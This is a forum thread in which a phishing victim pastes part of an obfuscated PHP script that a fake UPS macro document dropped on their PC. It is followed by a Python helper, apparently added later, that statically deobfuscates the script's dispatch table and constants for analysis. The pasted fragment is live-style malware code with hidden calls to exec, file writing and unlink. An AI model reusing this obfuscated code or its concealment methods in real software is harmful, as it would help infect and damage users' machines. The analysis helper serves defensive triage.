
cavemanager

New Members · Posts: 4 · Rank: Newbie (1/5) · Reputation: 0

  1. I clicked the link in my email and the file just downloaded/ran. I didn't manually go out to a website to download it. Like I said, the email looked really legit and I just happened to be waiting for a package from UPS. Plus, this was before I had coffee. Looking back, I should have hovered over the link to see the real destination. Live and learn.
  2. I'm not just downloading random files from the Internet. I am usually careful about these things, but it just so happened that I have UPS orders and the email looked legit. I don't know if you've heard, but even knowledgeable people can be tricked too. I did immediately disconnect from the network and do some file copies just in case. Meanwhile, Trend eventually grabbed the virus and I think I stopped it before it could do any damage. I am planning to wipe and re-install just because I know it's the best thing to do.
  3. I figured. Any way to check where/what else got added to my PC? I have Trend Micro AV as well as Malwarebytes. I've done scans but nothing turned up...
  4. I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- I removed a little less than half the code just in case I am actually posting malicious code to this forum. If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware.

     Script:

     <?php $GLOBALS['38744245'] = Array( 'cu' . 'rl_multi_exec', 'm' . 'ss' . 'ql_re' . 's' . 'ult', 'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts', '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents', 'ex' . 'ec', '' . 'unlink', '' . 'strpos', 'fg' . 'etcs' . 'v', 'strnat' . 'cmp', 'strlen', 'm' . 't_' . 'rand', 'p' . 're' . 'g_repla' . 'ce_callb' . 'ack', 'ch' . 'r', 'ord', 'st' . 'r' . 'po' . 's', 'array_' . 'fi' . 'lter', 's' . 'e' . 'ssion_is_r' . 'egist' . 'ered', 's' . 't' . 'rpos', 'cr' . 'eate_func' . 'tion', 'i' . 'm' . 'agecreatefrom' . 'gd2part', 'mt_' . 'rand' ); ?><?php function _1369297363($taqqmn) { $cabbfl = Array( "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e", "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21", 'i', 'bxhndsxsexibrxben', 'gdz', '', 'lxdgilfgvccek', 'vz' ); return $cabbfl[$taqqmn]; } ?><?php $ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.; while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25)) $GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm); $ovehlgp = _1369297363(0); $czdwupq = _1369297363(1); while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6)) $GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf); $ovehlgp = gnnnesr($ovehlgp, $ucdxetr); $czdwupq = gnnnesr($czdwupq, $ucdxetr); $yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp); if ($yxfgkhr) { $ghktwqf = gnnnesr($yxfgkhr, $ucdxetr); $GLOBALS['38744245'][3]($czdwupq, $ghktwqf); $GLOBALS['38744245'][4]($czdwupq); while (!$GLOBALS['38744245'][5]($czdwupq)) Sleep(round(0 + 1)); $ptdybmu = _1369297363(2); } function tpugtze($acdfplp, $gsseqei) { $wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75); if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false) $GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq); return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))); } function gnnnesr($rgyctvo, $ucdxetr) { $qaptxjz = _1369297363(5); while (round(0 + 3667) - round(0 + 3667)) $GLOBALS['38744245'][8]($yxfgkhr); [END PORTION OF CODE REMOVED] ?>
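The script in post 4 hides which PHP built-ins it calls by splitting each name into concatenated literals in a $GLOBALS dispatch table, and hides integer constants as round(0 + a + a + ...) sums. The static triage helper below is an added example, not code from the post or the forum: it undoes those two patterns so an analyst can read the dispatch table without executing anything. The SAMPLE string is constructed from a few entries visible in the post, not the full script.

```python
import math
import re

# Constructed sample (not the full posted script) reproducing its two patterns:
# concatenated-literal function names and round(0 + a + a ...) constants.
SAMPLE = (
    "$GLOBALS['38744245'] = Array( 'cu' . 'rl_multi_exec', "
    "'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts', '' . 'unlink', 'ex' . 'ec' ); "
    "$shift = $n & round(0 + 7.75 + 7.75 + 7.75 + 7.75); "
    "$width = round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667);"
)

CHAIN_RE = re.compile(r"'[^']*'(?:\s*\.\s*'[^']*')+")
ROUND_RE = re.compile(r"round\(\s*0(?:\s*\+\s*\d+(?:\.\d+)?)+\s*\)")


def join_concatenations(src: str) -> str:
    """Merge 'a' . 'b' . 'c' chains into the single literal 'abc'."""
    def merge(m: re.Match) -> str:
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"
    return CHAIN_RE.sub(merge, src)


def fold_round_constants(src: str) -> str:
    """Replace round(0 + x + x ...) with the integer PHP's round() yields."""
    def fold(m: re.Match) -> str:
        total = sum(float(t) for t in re.findall(r"\d+(?:\.\d+)?", m.group(0)))
        # PHP rounds half away from zero; all constants here are positive.
        return str(int(math.floor(total + 0.5)))
    return ROUND_RE.sub(fold, src)


def function_table(src: str) -> list[str]:
    """Resolved names in the $GLOBALS[...] = Array(...) dispatch table."""
    joined = join_concatenations(src)
    m = re.search(r"\$GLOBALS\[[^\]]+\]\s*=\s*Array\((.*?)\);", joined, re.S)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def deobfuscate(src: str) -> str:
    """Apply both transforms; the result is still PHP, only more readable."""
    return fold_round_constants(join_concatenations(src))


if __name__ == "__main__":
    print(function_table(SAMPLE))
    print(deobfuscate(SAMPLE))
```

Each $GLOBALS['38744245'][N](...) call in the script then reads as the Nth resolved name, e.g. index 2 is file_get_contents and index 5 is unlink, which is what an analyst needs to judge the file-handling the poster suspected.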